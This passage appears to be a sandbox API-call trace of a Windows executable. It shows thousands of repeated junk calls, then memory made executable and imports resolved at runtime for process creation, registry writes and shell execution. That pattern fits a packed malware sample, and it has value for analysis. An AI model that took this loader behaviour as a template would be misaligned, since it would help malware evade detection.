[0182.243] AddAtomA (lpString=0x0) returned 0x0 [0182.243] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.243] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.243] AddAtomA (lpString=0x0) returned 0x0 [0182.243] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.243] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.243] AddAtomA (lpString=0x0) returned 0x0 [0182.243] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.243] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.243] AddAtomA (lpString=0x0) returned 0x0 [0182.243] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.243] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.243] AddAtomA (lpString=0x0) returned 0x0 [0182.243] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.243] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.243] AddAtomA (lpString=0x0) returned 0x0 [0182.243] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.243] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.243] AddAtomA (lpString=0x0) returned 0x0 [0182.243] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.243] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.244] AddAtomA (lpString=0x0) returned 0x0 [0182.244] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.244] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.244] AddAtomA (lpString=0x0) returned 0x0 [0182.244] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.244] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.244] AddAtomA (lpString=0x0) returned 0x0 [0182.244] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.244] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.244] AddAtomA (lpString=0x0) returned 0x0 [0182.244] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.244] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.244] AddAtomA (lpString=0x0) returned 0x0 [0182.244] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.244] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.244] AddAtomA (lpString=0x0) returned 0x0 [0182.244] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.244] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.244] AddAtomA (lpString=0x0) returned 0x0 [0182.244] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.244] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.244] AddAtomA (lpString=0x0) returned 0x0 [0182.244] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.244] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.245] AddAtomA (lpString=0x0) returned 0x0 [0182.245] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.245] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.245] AddAtomA (lpString=0x0) returned 0x0 [0182.245] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.245] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.245] AddAtomA (lpString=0x0) returned 0x0 [0182.245] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.245] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.245] AddAtomA (lpString=0x0) returned 0x0 [0182.245] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.245] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.245] AddAtomA (lpString=0x0) returned 0x0 [0182.245] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.245] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.245] AddAtomA (lpString=0x0) returned 0x0 [0182.245] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.245] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.245] AddAtomA (lpString=0x0) returned 0x0 [0182.245] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.245] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.245] AddAtomA (lpString=0x0) returned 0x0 [0182.245] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.245] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.245] AddAtomA (lpString=0x0) returned 0x0 [0182.246] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.246] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.246] AddAtomA (lpString=0x0) returned 0x0 [0182.246] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.246] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.246] AddAtomA (lpString=0x0) returned 0x0 [0182.246] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.246] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.246] AddAtomA (lpString=0x0) returned 0x0 [0182.246] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.246] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.246] AddAtomA (lpString=0x0) returned 0x0 [0182.246] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.246] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.246] AddAtomA (lpString=0x0) returned 0x0 [0182.246] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.246] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.246] AddAtomA (lpString=0x0) returned 0x0 [0182.246] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.246] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.246] AddAtomA (lpString=0x0) returned 0x0 [0182.246] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.247] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.247] AddAtomA (lpString=0x0) returned 0x0 [0182.247] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.247] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.247] AddAtomA (lpString=0x0) returned 0x0 [0182.247] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.247] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.247] AddAtomA (lpString=0x0) returned 0x0 [0182.247] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.247] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.247] AddAtomA (lpString=0x0) returned 0x0 [0182.247] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.247] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.247] AddAtomA (lpString=0x0) returned 0x0 [0182.247] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.247] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.247] AddAtomA (lpString=0x0) returned 0x0 [0182.247] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.247] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.247] AddAtomA (lpString=0x0) returned 0x0 [0182.247] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.247] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.247] AddAtomA (lpString=0x0) returned 0x0 [0182.247] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.248] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.248] AddAtomA (lpString=0x0) returned 0x0 [0182.248] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.248] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.248] AddAtomA (lpString=0x0) returned 0x0 [0182.248] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.248] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.248] AddAtomA (lpString=0x0) returned 0x0 [0182.248] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.248] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.248] AddAtomA (lpString=0x0) returned 0x0 [0182.248] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.248] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.248] AddAtomA (lpString=0x0) returned 0x0 [0182.248] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.248] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.248] AddAtomA (lpString=0x0) returned 0x0 [0182.248] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.248] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.248] AddAtomA (lpString=0x0) returned 0x0 [0182.248] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.248] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.248] AddAtomA (lpString=0x0) returned 0x0 [0182.248] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.248] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.249] AddAtomA (lpString=0x0) returned 0x0 [0182.249] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.249] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.249] AddAtomA (lpString=0x0) returned 0x0 [0182.249] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.249] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.249] AddAtomA (lpString=0x0) returned 0x0 [0182.249] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.249] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.249] AddAtomA (lpString=0x0) returned 0x0 [0182.249] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.249] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.249] AddAtomA (lpString=0x0) returned 0x0 [0182.249] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.249] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.249] AddAtomA (lpString=0x0) returned 0x0 [0182.249] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.249] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.249] AddAtomA (lpString=0x0) returned 0x0 [0182.249] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.249] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.249] AddAtomA (lpString=0x0) returned 0x0 [0182.249] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.249] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.249] AddAtomA (lpString=0x0) returned 0x0 [0182.250] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.250] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.250] AddAtomA (lpString=0x0) returned 0x0 [0182.250] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.250] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.250] AddAtomA (lpString=0x0) returned 0x0 [0182.250] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.250] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.250] AddAtomA (lpString=0x0) returned 0x0 [0182.250] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.250] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.250] AddAtomA (lpString=0x0) returned 0x0 [0182.250] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.250] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.250] AddAtomA (lpString=0x0) returned 0x0 [0182.250] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.251] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.251] AddAtomA (lpString=0x0) returned 0x0 [0182.251] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.251] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.251] AddAtomA (lpString=0x0) returned 0x0 [0182.251] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.251] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.251] AddAtomA (lpString=0x0) returned 0x0 [0182.251] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.251] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.251] AddAtomA (lpString=0x0) returned 0x0 [0182.251] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.251] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.251] AddAtomA (lpString=0x0) returned 0x0 [0182.251] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.251] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.251] AddAtomA (lpString=0x0) returned 0x0 [0182.251] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.251] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.251] AddAtomA (lpString=0x0) returned 0x0 [0182.251] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.251] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.251] AddAtomA (lpString=0x0) returned 0x0 [0182.252] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.252] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.252] AddAtomA (lpString=0x0) returned 0x0 [0182.252] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.252] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.252] AddAtomA (lpString=0x0) returned 0x0 [0182.252] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.252] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.314] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0182.314] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0182.314] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0182.314] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0182.314] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0182.314] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0182.314] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0182.314] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0182.314] SetErrorMode (uMode=0x400) returned 0x0 [0182.315] SetErrorMode (uMode=0x0) returned 0x400 [0182.315] GetVersionExA (in: lpVersionInformation=0x18e550*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x2, dwPlatformId=0xffffffff, szCSDVersion="s}Çw") | out: lpVersionInformation=0x18e550*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0182.315] VirtualAlloc (lpAddress=0x0, dwSize=0x2d200, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0182.318] VirtualProtect (in: lpAddress=0x400000, dwSize=0x32000, flNewProtect=0x40, lpflOldProtect=0x18f5d8 | out: lpflOldProtect=0x18f5d8*=0x2) returned 1 [0182.425] VirtualFree (lpAddress=0x210000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.426] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76d30000 [0182.427] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0182.427] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0182.427] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0182.427] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0182.427] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessA") returned 0x76d41072 [0182.427] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyW") returned 0x76d63102 [0182.427] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0182.427] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0182.427] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0182.427] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0182.427] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0182.428] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0182.428] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0182.428] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0182.428] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0182.428] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0182.428] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileA") returned 0x76d45444 [0182.428] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0182.428] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0182.428] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0182.428] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0182.428] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0182.428] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0182.429] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0182.429] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatA") returned 0x76d62b7a [0182.429] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyA") returned 0x76d62a9d [0182.429] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentVariableA") returned 0x76d433a0 [0182.429] GetProcAddress (hModule=0x76d30000, lpProcName="GetShortPathNameA") returned 0x76d6594d [0182.429] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameA") returned 0x76d414b1 [0182.429] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0182.429] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0182.429] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0182.429] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0182.429] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineA") returned 0x76d451a1 [0182.429] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0182.430] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0182.430] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0182.430] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0182.430] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0182.430] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0182.430] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0182.430] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0182.430] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0182.430] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0182.430] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0182.430] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0182.430] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeSListHead") returned 0x77c794a4 [0182.431] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0182.431] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0182.431] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0182.431] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0182.431] GetProcAddress (hModule=0x76d30000, lpProcName="RaiseException") returned 0x76d458a6 [0182.431] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0182.431] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0182.431] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0182.431] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0182.431] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0182.431] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0182.431] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0182.431] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0182.432] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0182.432] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0182.432] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0182.432] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0182.432] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0182.432] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0182.432] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0182.432] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0182.432] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0182.432] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0182.432] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0182.432] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0182.432] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0182.433] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileExW") returned 0x76d51811 [0182.433] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0182.433] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0182.433] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0182.433] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0182.433] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0182.433] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyExW") returned 0x777240fe [0182.433] GetProcAddress (hModule=0x77710000, lpProcName="SetSecurityDescriptorDacl") returned 0x7772415e [0182.433] GetProcAddress (hModule=0x77710000, lpProcName="InitializeSecurityDescriptor") returned 0x77724620 [0182.433] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0182.433] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x759d0000 [0182.434] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteExW") returned 0x759f1e46 [0182.434] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0182.434] GetProcAddress (hModule=0x759d0000, lpProcName="CommandLineToArgvW") returned 0x759e9ee8 [0182.434] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x772f0000 [0182.434] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendW") returned 0x773081ef [0182.434] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsA") returned 0x7732ad1a [0182.434] GetProcAddress 